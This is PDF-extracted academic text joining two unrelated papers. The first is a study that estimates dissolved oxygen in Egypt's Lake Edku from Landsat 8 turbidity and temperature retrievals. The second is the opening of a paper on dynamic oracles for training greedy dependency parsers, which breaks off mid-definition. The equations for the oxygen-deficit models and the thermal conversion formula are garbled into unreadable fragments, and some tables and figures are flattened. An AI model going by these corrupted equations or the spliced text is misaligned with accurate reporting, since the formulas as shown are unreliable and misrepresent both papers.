Sravanthi et al., 2013; Dona et al., 2014; Dorji and Fearns 2016; Abayazid and El-Gamal 2017). In 2008, He et al. presented water quality retrieval models with proven successful results for optical nitrogenous and phosphorous components. Other parameters such as chlorophyll-a (chl-a) and Colored Dissolved Organic Matter (CDOM)) have also been covered in various studies (i.e. Brezonik et al., 2005; Thiemann and Kaufmann, 2000; Li et al., 2002; Dona et al., 2014). Remotely deriving weak and/or non- optical water quality characteristics, that have no directly-detectable reflection, is challenging. Consequently, early studies are mostly focused on water physical and biogeochemical components that are considered optically active (Giardino et al., 2014). However, limitation to water quality characteristics that are related to Inherent Optical Property (IOP) narrows down the parameters that can be assessed by remote sensing techniques. The Dissolved Oxygen (DO) concentration is considered a crucial indicator of water system healthiness, and governs recovery capability (UNESCO, 2005). Yet, being a non-optically active parameter, DO levels cannot be directly retrieved using remote sensing technique. This research study aims to present an approach to detect Dissolved Oxygen concentrations in an inland shallow coastal lake, using space-based imageries. Based on grounds of early DO modeling theories, as well as regional conditions, the study investigates the potentiality of deducing DO levels from optically detectable water quality parameters that affect, and be affected by, Oxygen presences in water. B. Study Area With growing population and development activities, the Nile Delta of Egypt experience challenging conditions. Lake Edku is located within the active Northwestern coastal zone of the Delta, between longitudes 30°8' & 30°23'E and latitudes 31°10' & 31°18'N (Fig. 1). The lake is characterized of having systematically shrinking free open water, altered ecosystem and deteriorating water quality state (Abayazid, 2015). Edku lake serves an active agri- urban basin, and bordered by dense aquaculture practices. Accordingly, the lake receives wastewaters with different pollution degree from fish farming therapeutic drugs, nutrient flux from agricultural drainage network (e.g. Edku, El-Boussili, Khairy and Bearsik drains), in addition to effluents from municipal WasteWater Treatment Plants (WWTPs) and industrial facilities (Siam and Ghobrial, 2000). The lake is connected to the Mediterranean Sea with single opening “Boghaz Al-Maadia”, which allows temporal tidal inflows and localized saline water interaction. Discharges with heavy nutrient levels, as well as the deceased salinity inputs, have encouraged excessive unwanted aquatic vegetation. That, in turn, disturbed natural circulation; flow dynamic and sediment transport, and hence self –purification within the lake (Hossen and Negm, 2017). II. MATERIALS AND METHODS This section addresses the basis of DO modeling that dictated selection process to the parameters included in this study application. Also, the ground truth data and corresponding satellite imageries considered are presented, and then followed by the approach adopted for algorithm development. A. Theory: Grounds for DO Modeling Modeling of Dissolved Oxygen in water bodies has been initiated in 1925 by Streeter and Phelps through an application in the Ohio River of the United States of America (Chapra, 1997). Simulation studies were based on the fact that the rate at which DO fluctuates in waters reflect the rate of Oxygen demand and release. Their modified model set foundation of DO sinks and sources through inclusion of factors proved affecting the Dissolved Oxygen depletion and recovery in a water body. Beside the initially considered coefficients that represent reaeration as well as settling/ decay processes, the model extension added representative components of aquatic flora role in the Oxygen production and exhaustion with photosynthetic activity. Furthermore, sediment consumption of DO has been added as an effective factor to be employed in the modified model for DO prediction. Equations 1 and 2 state the early model and modefied version; respectively. More details can be found in the text book of Chapra (1997) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 55 Figure 1. Edku Lake Dt = Do EXP                tKEXPtKEXP KK LK tK ac ca od a (1) Where; Dt is the predicted dissolved oxygen deficit concentration, t is the travel time, L is the BOD level at point of interest, Lo is the ultimate BOD level, Ka is the reaeration rate, Kd is the decomposition rate, Ks is the settling removal rate, Kc is the CBOD decay coefficient, and Do is the initial value of the oxygen deficit.           tK o a tK b a tK a tK na KttK on ca tKtK oc t a a aaanac eD K eS K eR K eP KK eeNK KK eeLK D                 1 11 (2) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 56 The modified model has added factors as; P the photosynthetic oxygen production rate, R the algal respiration rate, Sb the sediment oxygen demand rate, No the initial Nitrogenous BOD (NBOD), and Kn the NBOD decay coefficient. B. Field Measurements Ground truth data used were obtained from published research study by Okbah et al. (2017). Authors presented data collected in ten sampling locations distributed throughout the Edku Lake. Spatial distribution of field measurement locations reflects variability in the lake water quality, with regard to boundary interaction as well as flow movements within the lake (Fig. 2). Further, sampling campaigns have been carried out during four seasons; spring, summer, fall and winter of year 2016, which reflected the variable conditions that the coastal lake experince. Statistics of the field measurements show that in summer time DO levels reach the lowest concentrations, ranging from 1.6 to 9.4 mg/L, and experience wide variability within the lake with standard deviation of 3 among the ten investigated locations. Meanwhile, the highest DO levels occur in winter, ranging from11.3 to 18.1 mg/L, with standard deviation of 2.3. The lake water DO range from 7.5 to 14.0 mg/L in spring, whereas the fall season has slightly less concentrations, ranging from 5.0 to 13.1 mg/L. Maximum measured DO concentrations were mostly found in zones "C" and "D", as illustrated in figure (3). On the other hand, minimum levels occur in locations within the eastern zone "A", where most of direct wastewater discharges reach the lake water, especially in summer season. Field Sampling Location Figure 2. Field measurement locations in Lake Edku zones A, B, C, and D 0 2 4 6 8 10 12 14 16 18 Zone A Zone B Zone C Zone D Spring Summer Fall Winter D O ( m g /L ) Figure 3. Observed DO data during four seasons in Lake Edku zones International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 57 C. Remote Sensing Data In 2013, Ganoe and DeYoung presented theoretical basis for DO retrieval with the use of air-borne Raman spectroscopy instead of ship-based technology that customary required direct contact with the waterbody. Authors argued the advantages of air-based technique in measuring DO when compared to time consuming as well as limitation in detecting variability in changing water conditions during field trips. The research concluded promising success of remote sensing retrieval of the temporal and spatial dynamics of dissolved gas distributions in coastal ecosystems. Yet aerial arrangements are costly and not always readily available, while space-borne sensors can have more frequent revisits and reasonably spatial coverage with advancing spectral resolution. The imageries used in this study are the freely available Landsat 8 Operational Land Imager (OLI) from the Unitd States Geological Survey (USGS) Earth- Explorer website. The Landsat 8 (OLI/TIRS) is the most recent satellite that was launched in 2013 under the Landsat program, with swath width of 170 km and 16 days’ revisit interval. Since the in situ DO data have been collected during spring, summer, fall and winter of year 2016, images used in this study were acquired on nearest corresponding overpass dates to match the sampling data timing Table (1). Table (2) states the spectral range considered in this study, covering visible and Near-Infrared as well as Thermal Infrared bands. The necessary image processing and result analysis were carries out in Geographic Information System (GIS) environment. TABLE I. USED LANDSAT 8 (OLI) SCENES AND DATES OF ACQUISITION Scene ID (path177/row38) Date Acquired "LC81770382016071LGN01" 11-Mar-2016 "LC81770382016151LGN01" 30-May-2016 "LC81770382016231LGN01" 18-Aug-2016 "LC81770382016343LGN01" 8-Dec-2016 TABLE II. LANDSAT 8 (OLI) SPECTRAL BANDS CONSIDERED IN THIS STUDY Landsat 8 (OLI) bands Spectral range (μm) Band 2 (Visible) 0.450 - 0.51 Band 3 (Visible) 0.53 - 0.59 Band 4 (Visible) 0.64 - 0.67 Band 5 (Near-Infrared) 0.85 - 0.88 Thermal Infrared Sensor (TIRS) Thermal Infrared (Band 10) 10.6 - 11.19 Thermal Infrared (Band 11) 11.5 - 12.51 D. Algorithm Development Satellite imageries were processed for carrying out multiple regression technique and reaching best algoritm model for DO retrival in Lake Edku. Analysis have been performed with the spatially distributed field measurements of Dissolved Oxygen as related to the spectral reflectance values derived from Landsat images at corresponding dates in year 2016. The available field data were divided into two groups for building algorithm models. Then performance has been tested with the reserved second group of data for validation process. Based on the previously mentioned grounds of Streeter and Phelps DO modeling, as well as regional conditions defining water quality in coastal lakes of Egypt, the trophic and sediment-related properties were International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 58 considered key factors in selection. Primary, the parameters included for developing DO derivative algorithms were Turbidity, Total Suspended Sediments (TSS), and Chlorophyll-a. Also, Temperature was added in the DO retrieval process as an important driver affecting Oxygen level in water, especially with the thermal anthropogenic releases and flow dynamic irregularity within Lake Edku. Cutomarily, DO concentration in water is inversely related to the temperature. Therefore, zonation of thermal property is expceted to have direct reflection on DO retrieved distribution. In process, alternate combinations of the considered parameters have been investigated for optimal model results. Turbidity and TSS levels were deduced using findings of the recent research study of Abayazid and El-Gamal (2017). Authors concluded regional algorithm models for remotely sensed Turbidity and TSS in the Nile delta coastal zone, in terms of Landsat 8's reflectance from spectral bands; Band2ref, Band4ref and Band5ref, as presented in Equations 3 and 4, respectively. LN TURBIDITY = -1.2247+ [0.08112 Band4ref] + [2.944 Ln (Band2ref/Band4ref] (3) LN TSS = 0.0496 [3.325 + 13.222 Band5ref]3.2214 (4) While literature applications showed various retrieval algorithms for Chlorophyll-a (e.g. Dona et al., 2014; Akbar et al., 2010; Brivio et al., 2001), best agreeable results for quantifying Chlorophyll-a in Lake Edku were found with the ratio between reflectance from spectral bands 2 and 4 of landsat 8 (Eq. 5). Chlorophyll-a = Band2ref/ Band4ref (5) Thermal spectral data have been converted to Temperature "T", using the conversion formula presented in Equation 6 (USGS, 2015) (6) Where Lλ is the spectral radiance, and K1 and K2 are the thermal conversion constants found in Landsat imagery metadata files. Surface water temperature levels are calculated using averaged values of Thermal Infrared Bands (10) and (11). Sensitivity analysis was performed to select best combination of the considered parameters, with different seasonal conditions experinced in the lake. Accordingly, the optimal DO retrieval algorithm model with best fitting predictions, as well as least data requirement and calculation efforts, has been selected for result demonstration. III. RESULTS Many factors control the DO concentration within a waterbody; both sources and sinks (e.g. consumption by flora and aerobic organisms, oxidation of carbonaceous and nitrogenous material, decomposition of organic material, photosynthetic activity, degrading inorganic chemicals, re-aeration possibility as well as temperature, and dynamics in flow. Drainage water inflowing into Lake Edku from the interconnected stream networks reflect the expanding urban activities and industrial facilities, beside the intensive agricultural processes. In addition, the aquacultural practices add an extra polluting source. A. Remotely Sensed Input Parameters The four parameters initially considered as inputs for DO modeling have been spatially derived for spring, summer, fall and winter seasons of year 2016, with corresponding Landsat imageries. Example illustrations are found in figures 4, 5, 6 and 7 for Temperature, Turbidity, TSS and Chlorophyll-a levels within Lake Edku, respectively. 𝑇 = 𝐾2 𝐿𝑛 ( 𝐾1 𝐿λ + 1) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 59 Figure 4. Spatial distribution of derived Temperature (ºC) within Lake Edku in spring, 2016 35.72 8.37 Figure 5. Spatial distribution of derived Turbidity (NTU) within Lake Edku in spring, 2016 32.96 17.48 Figure 6. Spatial distribution of derived TSS (mg/L) within Lake Edku in spring, 2016 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 60 2.22 0.92 Figure 7. Spatial distribution of derived Chlorophyll-a (mg/m3) within Lake Edku in spring, 2016 B. Sensitivity Analysis For developing satellite-based Dissolved Oxygen retrieval model, analysis has been carried out with various combinations of input parameters versus DO field measurements. The selected ground truth data is distributed throughout the lake zones. Furthermore, the data covers the four seasons so that a wide range of water quality levels experienced in the lake is considered in the developed model. Table (3) presents model predictive capacity and goodness of fitting while considering selective inputs as well as seasonal variations of DO presence in the lake waters. Sensitivity analysis showed that TSS and Turbidity have similar effect in detecting Oxygen consumption in the waterbody under consideration. It was also found that the least influential factor is the Chlorophyll-a. Minor change with least effect in predictive capacity of the developed algorithm occurs when adding Chlorophyll-a to the input parameters. TABLE III. SENSITIVITY ANALYSIS FOR OPTIMAL DO RETRIEVAL ALGORITHM MODEL Seasons Input Parameters Regression Coefficient (R2) Spring & Fall & Winter Turb, TSS, Chl, Ln-temp 0.618 Summer & Fall & Winter Turb, TSS, Chl, Ln-temp 0.630 Spring & Summer & Fall Turb, TSS, Chl, Ln-temp 0.657 Summer & Fall Turb, TSS, Chl, Ln-temp 0.781 Spring & Fall Turb, TSS, Chl, Ln-temp 0.751 Spring & Winter Turb, TSS, Chl, Ln-temp 0.651 Spring & Summer & Fall Turb, TSS, Ln-temp 0.613 Summer & Fall & Winter Turb, TSS, Ln-temp 0.601 Spring & Fall & Winter Turb, TSS, Ln-temp 0.584 Spring & Fall Turb, TSS, Chl 0.644 Spring & Fall TSS, Chl, Ln-temp 0.676 Spring & Winter TSS, Chl, Ln-temp 0.554 Summer & Fall Turb, TSS, Ln-temp 0.766 Summer & Fall Turb, Chl, Ln-temp 0.798 Summer & Fall TSS, Ln-temp 0.756 Summer & Fall Turb, Ln-temp 0.792 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 61 C. Developed Algorithm Model for DO Retrieval Optimal derivative capacity for DO levels in Lake Edku, with least input parameter requirements, hence less processing works and costs, was found by using only Turbidity and natural logarithm of Temperature. The developed algorithm model, stated in Equation 7, proved reasonable fitness with regression coefficient of 0.79 (Fig. 8). DO=36.27+0.19 Turbidity–10.36 Ln (Temperature) (7) The proposed algorithm was then applied to the second group of data reserved for testing, and satellite- based derived DO concentrations were compared with the corresponding field measurements. Validation results proved acceptable predictive capacity of the developed algorithm model, with R2 of 0.66 (Fig. 9). Descriptive statistics for observed versus modeled yearly average DO levels within Lake Edku are presented in table (4). The developed model shows highly agreeable predictions with field measurements. However, the model failed to represent the very low DO concentration occurrence in the lake during summer season. R² = 0.793 0 2 4 6 8 10 12 14 16 0 2 4 6 8 10 12 14 16 Observed Dissolved Oxygen (mg/L) P re d ic te d D is s o lv e d O x y g e n ( m g /L ) Figure 8. Predictive capacity of developed algorithm model for DO Satellite-based retrieval R² = 0.669 0 2 4 6 8 10 12 14 0 2 4 6 8 10 12 14 16 Observed Dissolved Oxygen (mg/L) P re d ic te d D is s o lv e d O x y g e n ( m g /L ) Figure 9. Validation of the developed model for DO retrieval Once validated, the developed model has been applied to a set of landsat imageris to obtain retrieved DO spatial distribution in Lake Edku in time steps. Figure 10 illustrates comparison for observed versus derived DO concentrations during four seasons in Lake Edku. For the purpose of demonstration, figure (11) shows an example mapping of DO concentrations throughout the lake zones in winter time. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 62 TABLE IV. DESCRIPTIVE STATISTICS FOR OBSERVED VERSUS DERIVED YEARLY DO LEVELS WITHIN LAKE EDKU Descriptive Statistics Do (mg/L) Observed Modeled Mean 10.440 9.064 Minimum 1.560 4.552 Maximum 18.107 20.271 Standard Deviation 4.042 3.841 0 5 10 15 20 Spring Summer Fall Winter Observed Derived D O ( m g /L ) Figure 10. Observed versus derived DO concentrations during four seasons in Lake Edku Figure 11. Retrieved DO concentrations in Lake Edku during winter season International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 63 IV. DISCUSSION Main feature characterizes the Edku lake system is the patchy pattern of water quality. Dissolved Oxygen level ranges from less than 2 mg/L, in extremely poor water conditions, to concentrations over 15 mg/L. However, the exceedingly high DO level, with regional temperatures range of 15–30 ᵒC in coastal lakes, is considered 150-250% supersaturation and potentially signifies an unhealthy eutrophication condition (EPA, 1999). In investigating DO concentrations with reference to location within the lake, this case is clearly demonstrated in zone D of Lake Edku. It has been noted that there are very high DO levels, detected both in field measurements as well as derived DO concentrations, in zone D which comprise entrapped waters with rare interaction. In reviewing this condition, it was found that the area experience intensive unwarranted aquatic flora growth, and accordingly high rate of the photosynthetic oxygen production, that coincides with less active hydrodynamics and water exchange. On the other hand, Zone A, that is the nearest to major drainage inputs into the lake, has healthier DO concentrations. This zone, while loaded with excessive pollutants, experiences inflowing water velocity along with shallow water depth that allows partial compensation with higher re-aeration rate. Moderate range of DO concentrations exists mostly in zone B, and zone C, with combined effect of low temperature and suspended sediment concentrations as well as slower flow dynamics in zone B and localized tidal effect in zone C. V. CONCLUSIONS Developments and consequent concerns about water resources beneficial capacity require continuous monitoring. Field-based assessment of quality state is usually faced by limitations in spatial coverage, frequency of sampling as well as possible economic and accessibility obstcles. Meanwhile, applications with remote sensing techniques have proved successful retrival of water quality parameters, yet for optically active ones that have directly-detectable spectral signals. This research study presents an approach for deriving a non-optically active property of water quality, Dissolved Oxygen (DO), with reference to other space-based retrievable parameters that affect and be affected by DO concentrations. Derivation methodology is based on the grounds of DO modeling, as well as regional conditions that define water quality in coastal lakes of Egypt. The selected ground truth data is distributed throughout the lake zones. Furthermore, the data covers the four seasons so that a wide range of water quality levels experienced in the lake is reflected in the developed model. The study also presents results of sensitivity analysis for alternate input combinations. Consequently, optimal DO derivative algorithm model, with best predictive capacity and least data requirement, was found. The developed optimal model comprises two satellite-based inputs, namely Turbidity and Temperature, for the Edku coastal lake. With the acceptable predictive capacity achieved, the validated model facilitates regular assessment, with more frequent DO mapping, and possible following of historical changes. Spatial distribution of DO concentrations reflects the patchy pattern within Lake Edku, with regard to interactions in boundary as well as irregular flow dynamics within. The detected zonation nature calls for specific remedial measures that vary for each section. Finally, remote sensing techniques proved having the potential to play more roles in monitoring processes, and offering valuable information for sustainability management. The approach illustrated in this study sheds the light at the opportunity to expand applications with space-based earth observation products. The achieved promising results open the field for exploring more non-detectable water quality parameters that are interlinked with optically active properties in water. However further applications with finer imageries and intensive ground truth data are recommended for relationship with higher accuracy. REFERENCES [1] Abayazid, H., 2015. Assessment of temporal and spatial alteration in coastal lakes-Egypt. In: Proceedings of the eighteenth International Water Technology Conference (IWTC 2015), Sharm El Sheikh, 12– 14 Mar 2015, 598–608. [2] Abayazid, H., El-Gamal, A., 2017. Employing remote sensing for water clarity monitoring in the Nile Delta coast. International Water Technology Journal IWTJ 7(4), 265-277. [3] Akbar, T., Hassan, Q., Achari, G., 2010. A remote sensing based framework for predicting water quality of different source waters. International Archives of the Photogrammetry, Remote Sensing and Spatial Information Sciences 34, Part XXX. [4] Bilge, F., Yazici, B., Dogeroglu, T., Ayday, C., 2003. Statistical evaluation of remotely sensed data for water quality monitoring. International Journal of Remote Sensing 24(24), 5317–5326. [5] Brezonik, P., Menken, K.D., Bauer, M., 2005. Landsat-based remote sensing of lake water quality characteristics, including chlorophyll and colored dissolved organic matter (CDOM). Lake Reserv. Manag. 21, 373–382. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 64 [6] Brivio, P., Giardino, C., Zilioli, E., 2001. Determination of chlorophyll concentration changes in Lake Garda using an image- based reductive transfer code for landsat TM images. International Journal of Remote Sensing 22(2), 487-502. [7] Chapra, S.C., 1997. Surface water quality modeling. McGraw-Hill Co. Inc. [8] Dona, C., Sánchez, J.M., Caselles, V., Domínguez, J.A., Camacho, A., 2014. Empirical relationships for monitoring water quality of lakes and reservoirs through multispectral images. IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing 7(5), 1632-1641. [9] Dorji, P., Fearns, P., 2016. A quantitative comparison of Total Suspended Sediment algorithms: A case study of the last decade for MODIS and Landsat-based sensors. Remote Sens. 8, 810; doi:10.3390/rs8100810. [10] Environmental Protection Agency (EPA), 1999. Guidance manual for compliance with the interim enhanced surface water treatment rule. United States, Environmental Protection Agency, Office of Water (4607) publishing, EPA-815- R-99-010, 201p. [11] Ganoe, R., DeYoung, R., 2013. Remote sensing of Dissolved Oxygen and Nitrogen in water using raman spectroscopy. the NASA scientific and technical information (STI), NASA Center for AeroSpace Information, NASA/TM–2013-218142. [12] Gholizadeh, M.H., Melesse, A.M., Reddi, L., 2016. A comprehensive review on water quality parameters estimation using remote sensing techniques. Sensors 16 (8), 1298; doi:10.3390/s16081298. [13] Giardino, C., Bresciani, M., Stroppiana, D., Oggioni, A., Morabito, G., 2014. Optical remote sensing of lakes: an overview on Lake Maggiore. J. Limnol. 73(s1), 201-214; DOI: 10.4081/jlimnol.2014.817. [14] He, W., Chen, S., Liu, X., Chen, J., 2008. Water quality monitoring in slightly-polluted inland water body through remote sensing - A case study in Guanting Reservoir, Beijing, China. Front. Environ. Sci. Engin. China 2(2), 163–171; DOI 10.1007/s11783-008-0027-7. [15] Hossen, H., Negm, A., 2017. Sustainability of water bodies of Edku Lake, Northwest of Nile Delta, Egypt: RS/GIS Approach. Procedia Engineering 181, 404 – 411. [16] Kloiber, S.M., Brezonik, P.L., Bauer, M.E, 2002. Application of Landsat imagery to regional-scale assessments of lake clarity. Water Res. (36, 4330–4340. [17] Li, S., Wu, Q., Wang, X., 2002. Correlations between reflectance spectra and contents of Chlorophyll-a in Chaohu Lake. Journal of Lake Sciences 9 (14),228- 234. [18] Okbah, M., Abd El-Halim, A., Abu El-Regal, M., Nassar, M., 2017. Water quality assessment of Lake Edku using physicochemical and nutrients salts, Egypt. Chemistry reseach journal 2 (4), 104-117. [19] Siam, E., Ghobrial, M., 2000. Pollution influence on bacterial abundance and Chlorophyll-a concentration: case study at Idku Lagoon, Egypt. Scientia Marina SCI. MAR. 64 (1), 1-8. [20] Sravanthi, N., Ramana, I.V., YunusAli, P., Ashraf, M., Ali, M.M., Narayana, A.C., 2013. An algorithm for estimating Suspended Sediment concentrations in the coastal waters of India using remotely sensed reflectance and its application to coastal environments. Int. J. Environ. Res., 7(4),841-850. [21] Swain, R., Sahoo, B., 2017. Improving river water quality monitoring using satellite data products and a genetic algorithm processing approach. Sustainability of Water Quality and Ecology (9–10), 88– 114. [22] Thiemann, S., Kaufmann, H., 2000. Determination of Chlorophyll content and trophic state of lakes using field spectrometer and IRS- 1C satellite data in the Mecklenburg Lake district - Germany. Remote Sensing of Environment 73, 227- 235. [23] United Nations Educational, Scientific and Cultural Organization (UNESCO), 2005. water resources systems planning and management - ISBN 92-3-103998-9 – © UNESCO, 390 – 393. [24] United States Geological Survey (USGS), Earth Resources Observation and Science (EROS) Center, 2015. LANDSAT 8 (L8) data users’ handbook, Version 1.0, LSDS-1574. [25] Zhang, Y.Z., 2002. Application of an empirical neural network to surface water quality estimation in the Gulf of Finland using combined optical data and microwave data. Remote Sensing of Environment 81(2), 327–336. work_sps3smiruzambm2egtdi46wgpy ---- Training Deterministic Parsers with Non-Deterministic Oracles Training Deterministic Parsers with Non-Deterministic Oracles Yoav Goldberg Bar-Ilan University Department of Computer Science Ramat-Gan, Israel yoav.goldberg@gmail.com Joakim Nivre Uppsala University Department of Linguistics and Philology Uppsala, Sweden joakim.nivre@lingfil.uu.se Abstract Greedy transition-based parsers are very fast but tend to suffer from error propagation. This problem is aggravated by the fact that they are normally trained using oracles that are deter- ministic and incomplete in the sense that they assume a unique canonical path through the transition system and are only valid as long as the parser does not stray from this path. In this paper, we give a general characterization of oracles that are nondeterministic and com- plete, present a method for deriving such ora- cles for transition systems that satisfy a prop- erty we call arc decomposition, and instanti- ate this method for three well-known transi- tion systems from the literature. We say that these oracles are dynamic, because they allow us to dynamically explore alternative and non- optimal paths during training – in contrast to oracles that statically assume a unique optimal path. Experimental evaluation on a wide range of data sets clearly shows that using dynamic oracles to train greedy parsers gives substan- tial improvements in accuracy. Moreover, this improvement comes at no cost in terms of efficiency, unlike other techniques like beam search. 1 Introduction Greedy transition-based parsers are easy to imple- ment and are very efficient, but they are generally not as accurate as parsers that are based on global search (McDonald et al., 2005; Koo and Collins, 2010) or as transition-based parsers that use beam search (Zhang and Clark, 2008) or dynamic pro- gramming (Huang and Sagae, 2010; Kuhlmann et al., 2011). This work is part of a line of research trying to push the boundaries of greedy parsing and narrow the accuracy gap of 2–3% between search- based and greedy parsers, while maintaining the ef- ficiency and incremental nature of greedy parsers. One reason for the lower accuracy of greedy parsers is error propagation: once the parser makes an error in decoding, more errors are likely to fol- low. This behavior is closely related to the way in which greedy parsers are normally trained. Given a treebank oracle, a gold sequence of transitions is derived, and a predictor is trained to predict transi- tions along this gold sequence, without considering any parser state outside this sequence. Thus, once the parser strays from the golden path at test time, it ventures into unknown territory and is forced to react to situations it has never been trained for. In recent work (Goldberg and Nivre, 2012), we introduced the concept of a dynamic oracle, which is non-deterministic and not restricted to a single golden path, but instead provides optimal predic- tions for any possible state the parser might be in. Dynamic oracles are non-deterministic in the sense that they return a set of valid transitions for a given parser state and gold tree. Moreover, they are well- defined and optimal also for states from which the gold tree cannot be derived, in the sense that they return the set of transitions leading to the best tree derivable from each state. We showed experimen- tally that, using a dynamic oracle for the arc-eager transition system (Nivre, 2003), a greedy parser can be trained to perform well also after incurring a mis- take, thus alleviating the effect of error propagation and resulting in consistently better parsing accuracy. 403 Transactions of the Association for Computational Linguistics, 1 (2013) 403–414. Action Editor: Jason Eisner. Submitted 6/2013; Published 10/2013. c©2013 Association for Computational Linguistics. In this paper, we extend the work of Goldberg and Nivre (2012) by giving a general characteri- zation of dynamic oracles as oracles that are non- deterministic, in that they return sets of transitions, and complete, in that they are defined for all possible states. We then define a formal property of transition systems which we call arc decomposition, and in- troduce a framework for deriving dynamic oracles for arc-decomposable systems. Using this frame- work, we derive novel dynamic oracles for the hy- brid (Kuhlmann et al., 2011) and easy-first (Gold- berg and Elhadad, 2010) transition systems, which are arc-decomposable (as is the arc-eager system). We also show that the popular arc-standard system (Nivre, 2004) is not arc-decomposable, and so deriv- ing a dynamic oracle for it remains an open research question. Finally, we perform a set of experiments on the CoNLL 2007 data sets, validating that the use of dynamic oracles for exploring states that result from parsing mistakes during training is beneficial across transition systems. 2 Transition-Based Dependency Parsing We begin with a quick review of transition-based dependency parsing, presenting the arc-eager, arc- standard, hybrid and easy-first transitions systems in a common notation. The transition-based pars- ing framework (Nivre, 2008) assumes a transition system, an abstract machine that processes sentences and produces parse trees. The transition system has a set of configurations and a set of transitions which are applied to configurations. When parsing a sen- tence, the system is initialized to an initial configu- ration based on the input sentence, and transitions are repeatedly applied to this configuration. After a finite number of transitions, the system arrives at a terminal configuration, and a parse tree is read off the terminal configuration. In a greedy parser, a clas- sifier is used to choose the transition to take in each configuration, based on features extracted from the configuration itself. Transition systems differ by the way they define configurations, and by the particular set of transitions available. 2.1 Dependency Trees We define a dependency tree for a sentence W = w1, . . . ,wn to be a labeled directed tree T = (V,A), where V = {w1, . . . ,wn} is a set of nodes given by the tokens of the input sentence, and A ⊆ V ×L×V (for some dependency label set L) is a set of labeled directed arcs of the form (h,lb,d), where h ∈ V is said to be the head, d ∈ V the dependent, and lb ∈ L the dependency label. When dealing with unlabeled parsing, or when the label identity is irrelevant, we take A ⊆ V × V to be a set of ordinary directed arcs of the form (h,d). Note that, since the nodes of the tree are given by the input sentence, a dependency tree T = (V,A) for a sentence W is uniquely defined by the arc set A. For convenience, we will therefore equate the tree with the arc set and and use the symbol T for the latter, reserving the symbol A for arc sets that are not necessarily trees. In the context of this work it is assumed that all the dependency trees are projective. Although the general definition of a dependency tree does not make any assumptions about which node is the root of the tree, it is common practice in dependency parsing to add a dummy node ROOT, which is prefixed or suffixed to the sentence and which always acts as the root of the tree. We will follow this practice in our description of different transition systems below. 2.2 Transition Systems Arc-Eager In the arc-eager system (Nivre, 2003), a configuration c = (σ,β,A) consists of a stack σ, a buffer β, and a set A of dependency arcs.1 Given a sentence W = w1, . . . ,wn, the system is initialized with an empty stack, an empty arc set, and β = w1, . . . ,wn, ROOT, where ROOT is the special root node. Any configuration c with an empty stack and a buffer containing only ROOT is terminal, and the parse tree is given by the arc set Ac of c.2 The system has 4 transitions: RIGHTlb, LEFTlb, SHIFT, REDUCE, defined as follows: SHIFT[(σ, b|β, A)] = (σ|b, β, A) RIGHTlb[(σ|s, b|β, A)] = (σ|s|b, β, A∪{(s,lb,b)}) LEFTlb[(σ|s, b|β, A)] = (σ, b|β, A∪{(b, lb,s)}) REDUCE[(σ|s, β, A)] = (σ, β, A) 1We use σ|x to denote a stack with top element x and re- mainder σ, and x|β to denote a buffer with a head x followed by the elements in β. 2This definition of a terminal configuration differs from that in Nivre (2003) but guarantees that the set Ac is a dependency tree rooted in ROOT. 404 There is a precondition on the RIGHT and SHIFT transitions to be legal only when b 6= ROOT, and for LEFT, RIGHT and REDUCE to be legal only when the stack is non-empty. Moreover, LEFT is only le- gal when s does not have a parent in A, and REDUCE when s does have a parent in A. In general, we use LEGAL(c) to refer to the set of transitions that are le- gal in a configuration c. The arc-eager system builds trees eagerly in the sense that arcs are added at the earliest time possible. In addition, each word will collect all of its left dependents before collecting its right dependents. Arc-Standard The arc-standard system (Nivre, 2004) has configurations of the same form c = (σ,β,A) as the arc-eager system. The initial con- figuration for a sentence W = w1, . . . ,wn has an empty stack and arc set and β = ROOT,w1, . . . ,wn. A configuration c is terminal if it has an empty buffer and a stack containing the single node ROOT; the parse tree is given by Ac. The system has 3 transi- tions: RIGHTlb, LEFTlb, SHIFT, defined as follows: SHIFT[(σ, b|β, A)] = (σ|b, β, A) RIGHTlb[(σ|s1|s0, β, A)] = (σ|s1, β, A∪{(s1, lb,s0)}) LEFTlb[(σ|s1|s0, β, A)] = (σ|s0, β, A∪{(s0, lb,s1)}) There is a precondition on the LEFT transition to be legal only when s1 6= ROOT, and for LEFT and RIGHT to be legal only when the stack has at least two elements. The arc-standard system builds trees in a bottom-up fashion: each word must collect all its dependents before being attached to its head. The system does not pose any restriction with regard to the order of collecting left and right dependents. Hybrid The hybrid system (Kuhlmann et al., 2011) has the same configurations and the same initialization and termination conditions as the arc- standard system. The system has 3 transitions: RIGHTlb, LEFTlb, SHIFT, defined as follows: SHIFT[(σ, b|β, A)] = (σ|b, β, A) RIGHTlb[(σ|s1|s0, β, A)] = (σ|s1, β, A∪{(s1, lb,s0)}) LEFTlb[(σ|s, b|β, A)] = (σ, b|β, A∪{(b, lb,s)}) There is a precondition on RIGHT to be legal only when the stack has at least two elements, and on LEFT to be legal only when the stack is non-empty and s 6= ROOT. The hybrid system can be seen as a combination of the arc-standard and arc-eager Algorithm 1 Greedy transition-based parsing 1: Input: sentence W , parameter-vector w 2: c ← INITIAL(W) 3: while not TERMINAL(c) do 4: tp ← arg maxt∈LEGAL(c) w ·φ(c,t) 5: c ← tp(c) 6: return Ac systems, using the LEFT action of arc-eager and the RIGHT action of arc-standard. Like arc-standard, it builds trees in a bottom-up fashion. But like arc- eager, it requires a word to collect all its left depen- dents before collecting any right dependent. Easy-First In the easy-first system (Goldberg and Elhadad, 2010), a configuration c = (λ,A) consists of a list λ and a set A of dependency arcs. We use li to denote the ith member of λ and write |λ| for the length of λ. Given a sentence W = w1, . . . ,wn, the system is initialized with an empty arc set and λ = ROOT,w1, . . . ,wn. A configuration c is ter- minal with parse tree Ac if λ = ROOT. The set of transitions for a given configuration c = (λ,A) is: {LEFTilb|1 < i ≤ |λ|}∪{RIGHTilb|1 ≤ i < |λ|}, where: LEFTilb[(λ,A)] = (λ\{li−1}, A∪{(li, lb, li−1)}) RIGHTilb[(λ,A)] = (λ\{li+1}, 